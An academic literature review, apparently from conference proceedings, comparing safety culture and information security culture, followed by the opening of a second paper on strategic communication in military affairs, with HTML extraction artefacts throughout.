security research. It refers to the dom<strong>in</strong>ant understand<strong>in</strong>g of how <strong>in</strong>formation security pr<strong>in</strong>ciples are manifested <strong>in</strong> the<br />
daily operations of a company. The culture implies what k<strong>in</strong>d of behaviour of the employees is acceptable and<br />
encouraged. Literature about <strong>in</strong>formation security almost non-exceptionally uses the word security. However, <strong>in</strong> the<br />
field of organizational safety culture, the word security has little use. What is different? Is prevent<strong>in</strong>g human or<br />
material casualties really fundamentally different from prevent<strong>in</strong>g <strong>in</strong>formation casualties? This paper is triggered by<br />
the curiosity of how different literature streams discuss culture, be it called safety culture or security culture. Also the<br />
differences <strong>in</strong> approaches to security and safety are analysed. The term safety <strong>in</strong>cludes both the perspective of an<br />
object be<strong>in</strong>g protected from threats and the perspective of that object not caus<strong>in</strong>g threats. The term security <strong>in</strong>cludes<br />
only the perspective of an object be<strong>in</strong>g protected from threats. It is <strong>in</strong>terest<strong>in</strong>g to note, that both the words safety and<br />
security appear <strong>in</strong> the def<strong>in</strong>itions for the term security. In <strong>in</strong>formation security the focus is for many organizations on<br />
the threats that come from outside the organization. This seems to justify the use of the word security. However, <strong>in</strong><br />
many cases the biggest threats to the <strong>in</strong>formation of an organization come from <strong>in</strong>side the organization. Also, many<br />
organizations state that the <strong>in</strong>formation of customers is the most valuable to them and compromis<strong>in</strong>g customer<br />
<strong>in</strong>formation would not only harm the organization itself, but also its stakeholders. This would justify the use of the<br />
word safety <strong>in</strong> connection with <strong>in</strong>formation. This paper presents a literature review. The outcome of this paper is an<br />
understand<strong>in</strong>g of the differences and similarities of the concepts under stydy. Discussion on the mean<strong>in</strong>g of<br />
<strong>in</strong>formation security culture and implications to companies are presented.<br />
Keywords: Information security, security, safety, <strong>in</strong>formation security culture, concept analysis, mean<strong>in</strong>gs<br />
1. Introduction<br />
Organizational culture is an area where a lot of research is conducted to understand the dynamics of<br />
organizations and the way people behave <strong>in</strong> them. Over time approaches to the study of organizational<br />
culture have varied from sociology to management (Denison 1996). Research approaches have varied<br />
from ethnographies to action research and quantitative questionnaires (Denison 1996, Guldenmund<br />
2007). In this paper organizational culture, specifically safety culture literature is contrasted to <strong>in</strong>formation<br />
security culture literature. Although both share the same roots, there are also fundamental differences<br />
between these fields.<br />
Before safety and security culture as concepts can be further discussed, a brief look at the terms safety<br />
and security is needed. In everyday language these terms are often used as synonyms. However, there<br />
are some differences <strong>in</strong> the def<strong>in</strong>itions of these terms.<br />
Safety:<br />
The condition of be<strong>in</strong>g protected from or unlikely to cause danger, risk, or <strong>in</strong>jury<br />
Denot<strong>in</strong>g someth<strong>in</strong>g designed to prevent <strong>in</strong>jury or damage (Oxford Dictionary of English)<br />
<strong>Security</strong>:<br />
The state of be<strong>in</strong>g free from danger or threat<br />
The safety of a state or organization aga<strong>in</strong>st crim<strong>in</strong>al activity such as terrorism, theft, or espionage<br />
Procedures followed or measures taken to ensure the security of a state or organization<br />
The state of feel<strong>in</strong>g safe, stable, and free from fear or anxiety (Oxford Dictionary of English)<br />
Based on these def<strong>in</strong>itions, we can make the dist<strong>in</strong>ction that the term safety <strong>in</strong>cludes both the perspective<br />
of an object be<strong>in</strong>g protected from threats and the perspective of that object not caus<strong>in</strong>g threats. The term<br />
security <strong>in</strong>cludes only the perspective of an object be<strong>in</strong>g protected from threats.<br />
148
Ilona Ilvonen<br />
Literature about <strong>in</strong>formation security almost non-exceptionally uses the word security. However, <strong>in</strong> the<br />
field of corporate safety culture, the word security has little use. Still <strong>in</strong> both frameworks the organization<br />
can both be the target or the source of threats, although depend<strong>in</strong>g on the <strong>in</strong>dustry the proportions of<br />
these two may vary. This paper is triggered by the curiosity of how different literature streams discuss<br />
culture, be it called organizational culture, safety culture or security culture. The outcome of this paper is<br />
an understand<strong>in</strong>g of the differences and similarities of these concepts. In the follow<strong>in</strong>g, first the concept of<br />
organizational culture is exam<strong>in</strong>ed. Then both safety culture and <strong>in</strong>formation security culture literature<br />
streams are <strong>in</strong>troduced. These streams are then compared and analyzed.<br />
2. Organizational culture<br />
Organizational culture is a concept that has emerged <strong>in</strong> scientific literature as early as <strong>in</strong> the 1950<br />
(Guldenmund 2000, Denison 1996). The term however has really manifested itself <strong>in</strong> the scientific<br />
literature <strong>in</strong> the early 1980’s (Paalumäki 2010). Before this most research has been done under the term<br />
organizational climate. One approach to l<strong>in</strong>k these concepts together is to def<strong>in</strong>e organizational climate<br />
as someth<strong>in</strong>g that emerges from the organizational culture. (Guldenmund 2000) This means that<br />
organizational climate reflects the organizational culture, which is a more embedded construct and more<br />
difficult to research than organizational climate.<br />
Guldenmund (2000) def<strong>in</strong>es organizational culture hav<strong>in</strong>g seven characteristics.<br />
It is a construct rather than a concrete phenomenon.<br />
It is relatively stable, i.e. it changes slowly over time.<br />
It has multiple dimensions. These dimensions also vary depend<strong>in</strong>g on the researcher or author.<br />
It is shared by groups of people, and it is holistic. This means that also the way the components or<br />
levels of the culture construct the culture needs to be exam<strong>in</strong>ed.<br />
It consists of various aspects; this means that several, different cultures or climates can be<br />
dist<strong>in</strong>guished with<strong>in</strong> an organisation, e.g. a service climate or a safety culture. These dist<strong>in</strong>ctions<br />
have only been made for analytical or practical reasons to make the concept more tangible.<br />
It has many layers, and the more ”superficial” the layer, the easier it is to change. Certa<strong>in</strong> practices<br />
can constitute a culture, which is <strong>in</strong> many cases learned, be it national culture or organizational<br />
culture.<br />
It is functional. A simple and well-known def<strong>in</strong>ition of culture reads, ``the way we do th<strong>in</strong>gs around<br />
here'', which effectively captures this functional aspect.<br />
”Overall, organisational culture is a relatively stable, multidimensional, holistic construct<br />
shared by (groups of) organisational members that supplies a frame of reference and which<br />
gives mean<strong>in</strong>g to and/or is typically revealed <strong>in</strong> certa<strong>in</strong> practices.”(Guldenmund 2000)<br />
Accord<strong>in</strong>g to Sche<strong>in</strong>, organizational culture manifests itself on three levels: the level of artifacts, the level<br />
of values and the level of beliefs (Sche<strong>in</strong> 1984). The level of artifacts is the visible level of culture, which<br />
is easy to exam<strong>in</strong>e, but hard to <strong>in</strong>terpret. Other authors dist<strong>in</strong>guish more layers <strong>in</strong> what Sche<strong>in</strong> calls<br />
artifacts (Guldenmund 2000). For example the office space and work<strong>in</strong>g materials of an organization can<br />
be exam<strong>in</strong>ed, but to understand the mean<strong>in</strong>g of the office construction or the materials and <strong>in</strong>structions<br />
can be difficult. For this understand<strong>in</strong>g the values of the organization need to be exam<strong>in</strong>ed. This can be<br />
done by <strong>in</strong>terview<strong>in</strong>g organization members and by analyz<strong>in</strong>g the artifact contents. Even this analysis<br />
however does not provide a full understand<strong>in</strong>g on why organization members behave the way they do. To<br />
ga<strong>in</strong> true <strong>in</strong>sight <strong>in</strong>to the culture the level of assumptions and understand<strong>in</strong>gs needs to be exam<strong>in</strong>ed.<br />
Many authors mention organizational stories as one layer or element of the organizational culture<br />
(Guldenmund 2000). Although organizations are unique, there are typical stories that present themselves<br />
with small variations across different organizations. These stories can be either positively or negatively<br />
oriented. Positive stories depict heroes that have somehow saved the organization, overcome<br />
exceptional struggles or showed unexpected devotion to the organization. Negative stories depict<br />
situations, when management doesn’t follow guidel<strong>in</strong>es or acts unreasonably. (Mart<strong>in</strong> et al. 1983)<br />
These stories represent a way how each organization can dist<strong>in</strong>guish itself from the others. Although<br />
similar <strong>in</strong> structure, each story is unique <strong>in</strong> how it represents the culture of the company it is born from.<br />
(Mart<strong>in</strong> et al. 1983) An <strong>in</strong>terest<strong>in</strong>g viewpo<strong>in</strong>t to organizational stories is to contrast them to Sche<strong>in</strong>s levels<br />
of organizational culture. An organizational story can be an artifact (Sche<strong>in</strong> 1984) <strong>in</strong> case it is written <strong>in</strong><br />
149
Ilona Ilvonen<br />
an explicit form and <strong>in</strong> one way or another distributed through the organization. Many success stories are,<br />
or could be, used as artifacts to help people identify themselves with the organization. Negative stories<br />
however do not necessarily appear <strong>in</strong> an explicit form. If they are spread as word of mouth, are they<br />
artifacts? Rather, they are on the level of values, they convey the way for example how the management<br />
follows the explicit values of the company.<br />
Figure 1: The levels of organizational culture (applied from Sche<strong>in</strong> 1984)<br />
3. Safety culture<br />
Similar to organizational culture, safety culture research has begun as safety climate research (Clarke<br />
2000). Safety climate scores were expected to reflect the accident rates <strong>in</strong> companies, s<strong>in</strong>ce the safety<br />
climate works as a frame of reference for employee behaviour (Zohar 1980 <strong>in</strong> Grote 2007). This means<br />
that also <strong>in</strong> safety culture the safety climate is seen to reflect the underly<strong>in</strong>g safety culture, as illustrated<br />
<strong>in</strong> Figure 2. Cooper (2000) def<strong>in</strong>es safety culture as sub-culture of the organizational culture, unless an<br />
organization acts <strong>in</strong> a high-risk <strong>in</strong>dustry which would make safety culture the dom<strong>in</strong>ant culture <strong>in</strong> the<br />
organization. Safety culture however is not homogenous throughout a company. Different departments<br />
and teams may have their own conceptions about priorities for example between safety and production.<br />
Priorities vary accord<strong>in</strong>g to risk profiles, but these differences lead to differences <strong>in</strong> the safety cultures<br />
across the organization.(Cooper 2000)<br />
Observable<br />
Underly<strong>in</strong>g<br />
Artifacts & Creations<br />
Technology<br />
Art<br />
Visible & audible behavior<br />
patterns<br />
Values<br />
Basic assumptions<br />
Relationship to environment<br />
Nature of reality, time &<br />
space<br />
Nature of human nature<br />
Nature of human activity<br />
Safety culture<br />
Safety climate<br />
Figure 2: Relation between safety culture and safety climate<br />
150<br />
Visible but often not<br />
decipherable<br />
Greater level of<br />
awareness<br />
Taken for granted<br />
Invisible<br />
Preconscious
Ilona Ilvonen<br />
Grote (2007) sheds a new light to the discussion of safety culture often considered quite superficially as<br />
safety-promot<strong>in</strong>g norms and attitudes shared by the members of an organization. Accord<strong>in</strong>g to Grote a<br />
positive safety culture means centralized values and norms that work as a strong basis for choices that<br />
people make when they work autonomously and <strong>in</strong> a decentralized manner. Culture is seen more as a<br />
means to provide sufficient coord<strong>in</strong>ation and <strong>in</strong>tegration of otherwise autonomous agents than as the<br />
general assurance of safety as a core value. (Grote 2007) The notion of Cooper that each department<br />
may end up with a different safety culture is countered by the approach, that key values and norms need<br />
to be actively driven <strong>in</strong> the organization, so that they build a homogenous basis for the different safety<br />
cultures.<br />
Up to this po<strong>in</strong>t this paper has dealt ma<strong>in</strong>ly with different approaches and def<strong>in</strong>itions to the concepts at<br />
hand. However <strong>in</strong>terest<strong>in</strong>g, these def<strong>in</strong>itions don’t address much how a positive and beneficial safety<br />
culture is achieved. Measur<strong>in</strong>g the elements of a safety culture is tricky s<strong>in</strong>ce culture is a complex<br />
construct that has many elements that are difficult to measure. The organization creates safety, and this<br />
is only one aspect of its actions. By understand<strong>in</strong>g the operations of an organization the safety needs<br />
can be more precisely def<strong>in</strong>ed. If there are multiple goals, these goals can contradict the safety goals<br />
(Reiman & Oedewald 2010).<br />
Measur<strong>in</strong>g the effectiveness of safety culture is more easily said than done. One measure commonly<br />
used is the accident and <strong>in</strong>cident rate. There is however one big risk connected with this measure:<br />
Accidents and <strong>in</strong>cidents get hidden. The accident rate tells about the safety culture, but also of the ability<br />
of employees to hide m<strong>in</strong>or accidents. If it was not reported, it never happened. This k<strong>in</strong>d of attitude does<br />
not foster a proactive safety culture, which benefits from all <strong>in</strong>formation about accidents, <strong>in</strong>cidents and<br />
near misses. One factor of a safety culture is the communication and use of safety <strong>in</strong>cident <strong>in</strong>formation<br />
(Díaz-Cabrera et al. 2007). A simple and common sense based way of <strong>in</strong>terpret<strong>in</strong>g this factor is, that if<br />
safety report<strong>in</strong>g is really used for improvement and employees participate <strong>in</strong> the analysis and<br />
improvement efforts, they are motivated to report safety <strong>in</strong>cidents. In some organizations the managers<br />
and workers may have very different understand<strong>in</strong>gs about safety (Harvey et al. 2001), which may lead to<br />
the situation where employees feel management is only <strong>in</strong>terested <strong>in</strong> the safety report numbers, not the<br />
phenomena beh<strong>in</strong>d them.<br />
”Organizations are def<strong>in</strong>ed by what they ignore - ignorance that is embodied <strong>in</strong> assumptions – and by the<br />
extent to which people <strong>in</strong> them neglect the same k<strong>in</strong>d of considerations” (Weick 1998 <strong>in</strong> Reiman &<br />
Oedewald 2010). Safety is always someth<strong>in</strong>g that is defended aga<strong>in</strong>st recognized risks. Organizations<br />
need to be humble and admit that all risks can never be recognized. The actions should be directed at<br />
recogniz<strong>in</strong>g risks as early as possible. A good safety culture ma<strong>in</strong>ta<strong>in</strong>s a healthy humble attitude<br />
throughout the organization. To achieve this, the previously mentioned measurements need to support<br />
the safety culture.<br />
4. Information security culture<br />
Accord<strong>in</strong>g to Mart<strong>in</strong>s & Eloff (2002) <strong>in</strong>formation security culture refers to the dom<strong>in</strong>ant understand<strong>in</strong>g of<br />
how <strong>in</strong>formation security pr<strong>in</strong>ciples are manifested <strong>in</strong> the daily operations of a company. The culture<br />
implies what k<strong>in</strong>d of behaviour of the employees is acceptable and encouraged. (Mart<strong>in</strong>s & Eloff 2002)<br />
von Solms (2000) agrees to a great extent with the previous def<strong>in</strong>ition. Accord<strong>in</strong>g to him, the <strong>in</strong>formation<br />
security culture has to support the <strong>in</strong>structions and procedures of the organisation so that <strong>in</strong>formation<br />
security will become a natural part of daily rout<strong>in</strong>es (von Solms 2000). Accord<strong>in</strong>g to both of these<br />
sources, <strong>in</strong>formation security culture can also be consciously developed by direct<strong>in</strong>g employee behaviour<br />
<strong>in</strong> the desired direction. Schlienger & Teufel (2003) also have a somewhat similar approach to the<br />
concept. Accord<strong>in</strong>g to them, <strong>in</strong>formation security culture conta<strong>in</strong>s all the socio-cultural methods that<br />
support technical <strong>in</strong>formation security. Through the implementation of them <strong>in</strong>formation security becomes<br />
a part of daily operations. (Schlienger & Teufel 2003) These def<strong>in</strong>itions show that <strong>in</strong>formation security<br />
culture, contrary to safety and organizational culture research, is not directly born from <strong>in</strong>formation<br />
security climate research.<br />
Information security culture is a relatively new concept and def<strong>in</strong>itions for it do not vary much. The<br />
def<strong>in</strong>ition of the concept is complicated by the use of relat<strong>in</strong>g terms. Information security awareness<br />
(Siponen 2000, Tsohou et al. 2008) and <strong>in</strong>formation security obedience (Thomson et al. 2006) are<br />
examples of terms with parallel def<strong>in</strong>itions. Mak<strong>in</strong>g a clear dist<strong>in</strong>ction from the concept security culture is<br />
difficult, for example Ruighaver et al.( 2007) and Schlienger & Teufel (2003) the use term security culture<br />
to mean roughly the same as the others mean by the term <strong>in</strong>formation security culture.<br />
151
Ilona Ilvonen<br />
All of the previous sources are connected by the approach that <strong>in</strong>formation security culture <strong>in</strong>tensifies the<br />
implementation of technical <strong>in</strong>formation security <strong>in</strong>itiatives. Accord<strong>in</strong>g to them a good <strong>in</strong>formation security<br />
culture encourages the employees to obey security <strong>in</strong>structions because they understand the reasons for<br />
them. However, Ruighaver et al. (2007) have a different view. Accord<strong>in</strong>g to them, this k<strong>in</strong>d of approach<br />
limits the <strong>in</strong>formation security culture to only a small part of <strong>in</strong>formation security and furthermore, confirms<br />
an old belief accord<strong>in</strong>g to which <strong>in</strong>formation security is mostly a technical issue. They emphasise that<br />
<strong>in</strong>formation security is ma<strong>in</strong>ly a concern of the top management. The <strong>in</strong>formation security culture reflects<br />
the degree of success of management <strong>in</strong> address<strong>in</strong>g this concern. This is why the authors underl<strong>in</strong>e that<br />
an attempt should not be made to create an <strong>in</strong>formation security culture. Instead, the tools and policies of<br />
the company should be adapted to the dom<strong>in</strong>ant <strong>in</strong>formation security culture (Ruighaver et al. 2007). This<br />
approach reflects the fact that it is much easier to affect the procedures and tools than the culture.<br />
However, the authors do not fully address the situation of hav<strong>in</strong>g a poor security culture and how to deal<br />
with it.<br />
Information security culture is exam<strong>in</strong>ed, similar to safety culture, ma<strong>in</strong>ly through employee attitudes and<br />
behaviour. Still some authors emphasize that there are deeper layers to <strong>in</strong>formation security culture than<br />
just the layer of behaviour and attitudes, which is a similar notion to safety culture.<br />
5. <strong>Security</strong> culture and safety culture - <strong>in</strong>sights<br />
When the previous sections on safety culture and <strong>in</strong>formation security culture are compared, an<br />
<strong>in</strong>terest<strong>in</strong>g notion can be made: the def<strong>in</strong>itions for the concepts do not differ significantly. Information<br />
security culture def<strong>in</strong>itions emphasize a little more the role of <strong>in</strong>structions and procedures than safety<br />
culture def<strong>in</strong>itions, but this difference is not fundamental. A similarity between all of the sources cited <strong>in</strong><br />
this paper is, that not much consideration is given to the terms security, safety or culture. The mean<strong>in</strong>g of<br />
these terms is taken for granted, and the only concept <strong>in</strong> need of def<strong>in</strong>ition is the construct of the terms:<br />
safety culture or security culture. This <strong>in</strong> spite the fact that the term culture or organizational culture does<br />
not have a s<strong>in</strong>gle def<strong>in</strong>ition that could be assumed is known and agreed upon by the readers, as<br />
<strong>in</strong>troduced <strong>in</strong> the second section. Also the mean<strong>in</strong>g of the words safety or security is not discussed.<br />
The ma<strong>in</strong> differences of these literature streams is the <strong>in</strong>dustries the applications and research are done<br />
<strong>in</strong>. Safety research tends to focus on <strong>in</strong>dustries with high risks, e.g. nuclear <strong>in</strong>dustry, traffic or healthcare<br />
(e.g. (Grote 2007, Harvey et al. 2001, Glendon & Stanton 2000). In these <strong>in</strong>dustries the biggest risks are<br />
<strong>in</strong>volved with threats of human casualties, either to the employees or to customers or people <strong>in</strong> general.<br />
Information security literature is <strong>in</strong> many cases written from the viewpo<strong>in</strong>t of <strong>in</strong>formation –<strong>in</strong>tensive<br />
organizations, but the <strong>in</strong>dustry range is not as specific as <strong>in</strong> safety culture literature. The implicit<br />
differentiation <strong>in</strong> the use of the words safety and security seem to be that safety deals with risks that<br />
<strong>in</strong>volve the potential of material or human casualties, which are caused by the actions of people with<strong>in</strong><br />
the organization. <strong>Security</strong> is connected to threats that come from outside the organization, <strong>in</strong> the<br />
mentioned <strong>in</strong>dustries e.g. terrorism is such a threat.<br />
If this differentiation is taken to the immaterial world of <strong>in</strong>formation, both elements of safety and security<br />
are present. There are many elements <strong>in</strong> <strong>in</strong>formation security that do not deal with an outside threat,<br />
rather many <strong>in</strong>formation security compromises can be recognized as accidents with<strong>in</strong> the company.<br />
Information safety would be the concept that addresses these threats. These different approaches are<br />
contrasted <strong>in</strong> Table 1.<br />
Table 1: The mean<strong>in</strong>gs of security and safety <strong>in</strong> different environments<br />
Term ”traditional” environment Information environment<br />
Safety The protection aga<strong>in</strong>st human or material<br />
casualties caused from with<strong>in</strong> the<br />
organization<br />
<strong>Security</strong> The protection aga<strong>in</strong>st human or material<br />
casualties caused from outside the<br />
organization<br />
The protection aga<strong>in</strong>st <strong>in</strong>formation loss or<br />
damages caused from with<strong>in</strong> the organization<br />
The protection aga<strong>in</strong>st <strong>in</strong>formation loss or<br />
damages caused from outside the organization<br />
The benefit of the dist<strong>in</strong>ction between <strong>in</strong>formation security and <strong>in</strong>formation safety would be that the<br />
<strong>in</strong>ternal threats and external threats would get equal consideration. Today the emphasis tends to be on<br />
external threats and the technical protection mechanisms (Siponen 2000, von Solms & von Solms 2004).<br />
In today’s world security culture does not need much emphasis. Terrorist threats, <strong>in</strong>formation leaks, and<br />
the like are very much on the m<strong>in</strong>ds of all nations, organizations and <strong>in</strong>dividuals. Safety culture on the<br />
152
Ilona Ilvonen<br />
other hand might need more effort. Danger from with<strong>in</strong> is more difficult to recognize, because when<br />
people get used to the environment they act <strong>in</strong>, they get bl<strong>in</strong>d sighted by habit (Taleb 2008). What once<br />
was a safe action may change <strong>in</strong>to an unsafe action due to the changed circumstances. A positive safety<br />
culture requires active spott<strong>in</strong>g of potential threats, be it technical failures, human error or <strong>in</strong>tentional<br />
break<strong>in</strong>g of the <strong>in</strong>structions.<br />
6. Conclusions<br />
As seen <strong>in</strong> the previous section, the terms safety and security are taken for granted <strong>in</strong> the literature that<br />
uses them. The conscious exam<strong>in</strong>ation of what safety culture and security culture mean could benefit<br />
companies <strong>in</strong> the context of <strong>in</strong>formation and knowledge. In <strong>in</strong>formation security the threats are<br />
traditionally seen to orig<strong>in</strong>ate from outside the organization. From the culture perspective this means that<br />
there is a shared belief <strong>in</strong> the organization that the ma<strong>in</strong> threats to <strong>in</strong>formation come from outside. An<br />
<strong>in</strong>formation safety culture viewpo<strong>in</strong>t would complement this by add<strong>in</strong>g the <strong>in</strong>ternal perspective. The safety<br />
perspective of the organization not harm<strong>in</strong>g others is also relevant <strong>in</strong> the context of <strong>in</strong>formation and<br />
knowledge, as can be seen for example from the contemporary case of Wikileaks. The <strong>in</strong>formation that<br />
was leaked from US government agencies did not only harm these agencies, but caused problems to<br />
various other actors.<br />
Organizational culture is def<strong>in</strong>ed to be a complex construct with multiple layers and aspects to it. As subcultures<br />
security culture and safety culture are as well complex and deserve appropriate attention. The<br />
attempts to measure safety or security culture with one-dimensional measures has not provided with the<br />
desired results. This should lead to appreciation of the complexity and multidimensionality of the cultures,<br />
and to profound consideration on what layers of the culture are possible to measure and affect. After that<br />
the employees of the organization can be empowered to promote the safety and security of the<br />
organization <strong>in</strong> many aspects, health as well as <strong>in</strong>formation.<br />
This paper is l<strong>in</strong>ked to the doctoral dissertation work of the author, which <strong>in</strong>cludes conceptual analysis of<br />
knowledge security. The dissertation is situated <strong>in</strong> between the fields of knowledge management and<br />
<strong>in</strong>formation security, and the literature researched for this paper triggers <strong>in</strong>terest<strong>in</strong>g perspectives to the<br />
dissertation topic. Especially <strong>in</strong> connection to knowledge that is embedded <strong>in</strong> the employees of a<br />
company, both the security and safety aspects would need to be considered.<br />
References<br />
Clarke, S. 2000, "Safety culture: under-specified and overrated?", International Journal of Management Reviews, vol.<br />
2, no. 1, pp. 65-90.<br />
Cooper, M.D. 2000, "Towards a model of safety culture", Safety Science, vol. 36, no. 2, pp. 111-136.<br />
Denison, D.R. 1996, "What is the Difference between Organizational Culture and Organizational Climate? A Native's<br />
Po<strong>in</strong>t of View on a Decade of Paradigm Wars", The Academy of Management Review, vol. 21, no. 3, pp. pp.<br />
619-654.<br />
Díaz-Cabrera, D., Hernández-Fernaud, E. & Isla-Díaz, R. 2007, "An evaluation of a new <strong>in</strong>strument to measure<br />
organisational safety culture values and practices", Accident Analysis & Prevention, vol. 39, no. 6, pp. 1202-<br />
1211.<br />
Glendon, A.I. & Stanton, N.A. 2000, "Perspectives on safety culture", Safety Science, vol. 34, no. 1-3, pp. 193-214.<br />
Grote, G. 2007, "Understand<strong>in</strong>g and assess<strong>in</strong>g safety culture through the lens of organizational management of<br />
uncerta<strong>in</strong>ty", Safety Science, vol. 45, no. 6, pp. 637-652.<br />
Guldenmund, F.W. 2000, "The nature of safety culture: a review of theory and research", Safety Science, vol. 34, no.<br />
1-3, pp. 215-257.<br />
Guldenmund, F.W. 2007, "The use of questionnaires <strong>in</strong> safety culture research – an evaluation", Safety Science, vol.<br />
45, no. 6, pp. 723-743.<br />
Harvey, J., Bolam, H., Gregory, D. & Erdos, G. 2001, "The effectiveness of tra<strong>in</strong><strong>in</strong>g to change safety culture and<br />
attitudes with<strong>in</strong> a highly regulated environment", Personnel Review, vol. 30, no. 6, pp. 615-636.<br />
Mart<strong>in</strong>, J., Feldman, M.S., Hatch, M.J. & Sitk<strong>in</strong>, S.B. 1983, "The Uniqueness Paradox <strong>in</strong> Organizational Stories",<br />
Adm<strong>in</strong>istrative Science Quarterly, vol. 28, no. 3, Organizational Culture, pp. pp. 438-453.<br />
Mart<strong>in</strong>s, A. & Eloff, J.H. 2002, "Information <strong>Security</strong> Culture", In <strong>Security</strong> <strong>in</strong> the <strong>in</strong>formation society IFIP/SEC2002<br />
Kluwer <strong>Academic</strong> Publishers, Boston, pp. 203.<br />
Paalumäki,A. (2010) Organisaatiokulttuuri tutkimusalueena, TTY Turvallisuuskulttuurisem<strong>in</strong>aari, 23.11.2010.<br />
Reiman,T. & Oedewald,P. (2010) Turvallisuuskulttuuri osana organisaatiokulttuuria, TTY<br />
Turvallisuuskulttuurisem<strong>in</strong>aari 23.11.2010.<br />
Ruighaver, A.B., Maynard, S.B. & Chang, S. 2007, "Organisational security culture: Extend<strong>in</strong>g the end-user<br />
perspective", Computers & <strong>Security</strong>, vol. 26, no. 1, pp. 56-62.<br />
Sche<strong>in</strong>, E. 1984, "Com<strong>in</strong>g to a New Awareness of Organizational Culture", Sloan Management Review, vol. 25, no.<br />
2, pp. 2-16.<br />
153
Ilona Ilvonen<br />
Schlienger, T. & Teufel, S. 2003, "Analyz<strong>in</strong>g <strong>in</strong>formation security culture: <strong>in</strong>creased trust by an appropriate<br />
<strong>in</strong>formation security culture", Proceed<strong>in</strong>gs of the 14th International Workshop on Database and Expert Systems<br />
Applications, pp. 405.<br />
Siponen, M. 2000, "A conceptual foundation for organizational <strong>in</strong>formation security awareness. ", Information<br />
Management & Computer <strong>Security</strong>, vol. 8, no. 1, pp. 31-41.<br />
Taleb, N.N. 2008, The Black Swan - the impact of the highly improbable, Pengu<strong>in</strong>, London 366 p.<br />
Thomson, K., von Solms, R. & Louw, L. 2006, "Cultivat<strong>in</strong>g an organizational <strong>in</strong>formation security culture", Computer<br />
Fraud & <strong>Security</strong>, vol. 2006, no. 10, pp. 7-11.<br />
Tsohou, A., Kokolakis, S., Karyda, M. & Kiountouzis, E. 2008, "Investigat<strong>in</strong>g Information <strong>Security</strong> Awareness:<br />
Research and Practice Gaps", Information <strong>Security</strong> Journal: A Global Perspective, vol. 17, no. 5, pp. 207-227.<br />
von Solms, B. 2000, "Information <strong>Security</strong> - The Third Wave? ", Computers & <strong>Security</strong>, vol. 19, pp. 615-620.<br />
von Solms, R. & von Solms, B. 2004, "From policies to culture", Computers & <strong>Security</strong>, vol. 23, no. 4, pp. 275-279.<br />
154
Strategic Communication and Revolution <strong>in</strong> Military Affairs:<br />
Describ<strong>in</strong>g Actions and Effects<br />
Saara Jantunen<br />
National Defence University, Hels<strong>in</strong>ki, F<strong>in</strong>land<br />
sijantunen@gmail.com<br />
Abstract: Changes <strong>in</strong> the concept or war are reflected by descriptions of military action. This article <strong>in</strong>troduces a<br />
parameter system for analyz<strong>in</strong>g strategic communication, which po<strong>in</strong>ts out the division of military communication <strong>in</strong>to<br />
tactical-operational and strategic levels. The system <strong>in</strong>cludes the parameter of legitimity - whether an action is<br />
legitimate warfare or not. Second, it conta<strong>in</strong>s the good/bad parameter, which is manifested by the old tradition of<br />
glorification and demonization <strong>in</strong> war rhetoric. The focus of this paper is on discuss<strong>in</strong>g the third parameter: the<br />
exclusive parameter. It determ<strong>in</strong>es whether certa<strong>in</strong> behavior is exclusive for 'us' or 'the other', and is often our only<br />
cue to decid<strong>in</strong>g what is strategic communication, and functions on the strategic level. This approach l<strong>in</strong>ks l<strong>in</strong>guistics<br />
to strategy studies.<br />
Keywords: strategic communication, l<strong>in</strong>guistics, RMA<br />
1. Introduction<br />
The legitimacy of warfare is one of the key themes <strong>in</strong> news report<strong>in</strong>g <strong>in</strong> the 21st century. Dur<strong>in</strong>g the war<br />
<strong>in</strong> Iraq, the Pentagon has been eager to rem<strong>in</strong>d the audience how committed they are to the Geneva<br />
conventions and the rules of war. The legitimacy of the war has been questioned, and depend<strong>in</strong>g on who<br />
is asked, the war may be called either a liberation operation, an attack, an <strong>in</strong>vasion or humanitarian<br />
<strong>in</strong>tervention.<br />
The prototype of a war is a battle that follows certa<strong>in</strong> rules and norms, and where the warwag<strong>in</strong>g parties<br />
are entitled to a def<strong>in</strong>ed selection of actions, such as attack<strong>in</strong>g and defend<strong>in</strong>g, communicat<strong>in</strong>g and<br />
reconnoiter<strong>in</strong>g. These are terms that are associated with war and skills that are taught <strong>in</strong> every military<br />
academy.<br />
Information warfare, however, speaks of both own and enemy action very differently. War crimes set<br />
aside, the enemy typically behaves <strong>in</strong> an immoral or cowardly way, as the enemy is demonized and 'self'<br />
is glorified. The hotter the battle, the less the adversary acts like a legitimate military force: terms such as<br />
terrorize, brutalize and kill women and children enter the lexicon.<br />
In other words, military discourse has different parameters. First there is, as discussed above, the<br />
parameter of legitimity - whether an action is legitimate warfare or not. Then, there is the good/bad<br />
parameter, which is manifested by the tradition glorification and demonization <strong>in</strong> war rhetoric. This paper<br />
focuses on discuss<strong>in</strong>g the third parameter: the <strong>in</strong>clusive/exclusive parameter. This parameter determ<strong>in</strong>es<br />
whether certa<strong>in</strong> behavior is <strong>in</strong>clusive or exclusive behavior for 'us' or 'the other'. It, as will be argued, is a<br />
cue to dist<strong>in</strong>guish<strong>in</strong>g rhetoric with strategic motives from other communication.<br />
The descriptions of Action and Effects symbolize the current concept of warfare. Strategy has to be<br />
converted <strong>in</strong>to communication. Action descriptions, the core of language (Halliday, 2004), have an<br />
important role <strong>in</strong> the narratives of warfare, where actions speak louder than words. As the nature of war<br />
evolves, the changes are reflected by language - <strong>in</strong> this case by the language of strategic<br />
communication.<br />
2. 'New war': Revolution <strong>in</strong> Military Affairs and the Grand Military Narrative<br />
The Revolution <strong>in</strong> Military Affairs (RMA) is to military affairs what <strong>in</strong>dustrial revolution was to 19th century<br />
society. The evolution of technology has created a world of efficiency and speed. In warfare, this<br />
evolution is represented by concepts such as stealth technology, drones, new precision munitions and<br />
cyber warfare. The RMA is described as "a higher-tech, <strong>in</strong>formation-based type of warfare" which "will<br />
take a force that is smart and well educated, one that is comfortable with technology and can th<strong>in</strong>k<br />
critically" (Pang, 1997). In order to f<strong>in</strong>ance the RMA, another revolution was needed: the revolution <strong>in</strong><br />
bus<strong>in</strong>ess affairs. The use of the term revolution (<strong>in</strong>stead of evolution) emphasizes the active efforts <strong>in</strong><br />
decisionmak<strong>in</strong>g and the objectives of the military <strong>in</strong>dustry, and the effects of the revolution <strong>in</strong> the private<br />
sector (through contractor agreements) can be seen <strong>in</strong> the bus<strong>in</strong>ess world. This 'revolution' affects the<br />
entire society.<br />
155
Saara Jantunen<br />
The Revolution <strong>in</strong> Military Affairs has manifested its essence <strong>in</strong> the Gulf War, Kosovo, Iraq and<br />
Afghanistan. These wars have demonstrated the technological gap between the adversaries. The lower<br />
